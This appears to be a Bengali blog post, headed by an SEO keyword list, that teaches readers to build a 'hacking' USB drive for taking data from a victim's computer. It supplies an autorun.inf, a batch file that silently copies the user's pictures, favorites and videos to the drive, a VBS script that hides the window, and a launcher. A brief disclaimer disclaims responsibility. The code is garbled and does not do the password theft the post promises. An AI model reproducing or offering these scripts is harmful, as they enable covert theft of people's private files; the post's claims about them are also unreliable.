computer hacking by usb

hacking,usb hacking,usb,computer,hacking device,how to make usb hacking device,pendrive hacking,hacking usb,usb hacker,how computer can be hacked with usb,portable hacking usb,hacking with usb,portable hacking device,make a hacking usb,bypassing windows passwords by hacking usb,best hacking usb,password hacking usb,hack usb,password stealing usb,make portable hacking usb,hack computer with usb,hack
computer hacking by usb

আজ আমি এই পোস্টে আপনাদের দেখাবো যে কোনো কম্পিউটারের পাসওয়ার্ড সহ সব গোপন তথ্য কিভাবে হাতিয়ে নেয়া যায়। শুধুমাত্র ভিক্টিমের কম্পিউটারে আপনার পেনড্রাইভ ঢুকিয়ে বের করলেই হবে, আপনাকে আর কিছুই করতে হবে না। তার আগে আপনার পেনড্রাইভে কিছু কাজ করে রাখতে হবে। তো চলুন দেখে নিই কি কাজ করে রাখতে হবে। তবে এই পোষ্টের নিচের অংশে যাওয়ার আগে এই কথাগুলো খুব মনোযোগ সহকারে শুনুন, কখনোই কারো ক্ষতি করার উদ্দেশ্যে এই পদ্ধতিগুলো ব্যবহার করবেন না। শুধুমাত্র জানার জন্য এবং শেখার জন্য এই পোস্টগুলো করা হয়। এই পোস্ট গুলোর মাধ্যমে অর্জিত জ্ঞান দ্বারা যদি আপনারা কারো কোন ধরনের ক্ষতি করেন, তার দায়দায়িত্ব আমি সবুজ বা আমার গ্রুপ সবুজ বাংলা ইউটিউব হেল্পলাইন কখনই কোনভাবে নেবে না।
আপনাদের ৪ টি ফাইল বানাতে হবে।
তো চলুন বানিয়ে ফেলি, কি ভয় পাচ্ছেন!! তেমন কিছু না শুধু নোটপ্যাড ওপেন করুন আর আমার দেওয়া কোড কপি করে নোটপ্যাডে paste করবেন।
১ম ফাইল
নিচের কোডটি কপি করে নোটপ্যাডে পেস্ট করুন।
[autorun]
icon=drive.ico open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat
এবার ফাইলটিকে autorun.inf নামে সেভ করুন।
২য় ফাইল
নিচের কোডটি কপি করে নোটপ্যাডে পেস্ট করুন।
@echo off
:: variables /min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /
e /h /i /r /y
echo off
%backupcmd% “%USERPROFILE% \pictures””%drive%\Data\My
pics”
%backupcmd% “%USERPROFILE%
\Favorites” “%drive%\Data
\Favorites”
%backupcmd% “%USERPROFILE% \videos””%drive%\Data\vids”
@echo off
cls
এবার এটাকে File.bat নামে সেভ করুন।
৩য় ফাইল
আবার নোটপ্যাড ওপেন করে নিচের কোড কপি করে পেস্ট করুন।
CreateObject(“Wscript.Shell”). Run “””” & WScript.Arguments(0)
& “”””,0, False
এটিকে Invisible.vbs নামে সেভ করুন।
৪র্থ ফাইল
কোডটি কপি করে নোটপ্যাডে পেস্ট করুন।
wscript.exe \invisible.vbs file.bat
এবার এটাকে Launch.bat নামে সেভ করুন।
ব্যাস আমাদের ফাইল ক্রিয়েট কম্পলিট। এবার পেনড্রাইভে নিউ ফোল্ডার নিয়ে গিয়ে Data নামে সেভ করুন এবং তার ভিতর উক্ত ০৪টি ফাইল রাখুন। পেনড্রাইভের কাজ শেষ, এবার যে কম্পিউটারে পেনড্রাইভ ঢুকিয়ে বের করবেন, সেই কম্পিউটারের তথ্য পেয়ে যাবেন। পোস্টটি ভাল লাগলে একটা লাইক দিন এবং কমেন্ট করুন। কোন সমস্যা হলে বলবেন যথাসাধ্য সাহায্য করার চেষ্টা করবো। ইনশাআল্লাহ। আরো বিস্তারিত জানতে আমার ইউটিউব চ্যানেলটি সাবস্ক্রাইব করে সাথে থাকুন।


MR Laboratory Public blog

আমাদের এই ব্লগে আপনি ও  লিখতে পারবেন । এর জন্য আপনি আপনার লিখা আমাদেরকে ইমেইল করতে পারেন । অথবা আমাদের একজন সদস্য হয়ে ও পোস্ট করতে পারবেন । আমাদের ওয়েবসাইট এর সদস্য হতে চাইলে ভিসিট করুন । আপ্বনার লিখা অবস্যয় শিক্ষনীয় হতে হবে । আমাদের ইমেইল ঠিকানা [email protected]


Next Post Previous Post
No Comment

You cannot comment with a link / URL. If you need backlinks then you can guest post on our site with only 5$. Contact

Add Comment
comment url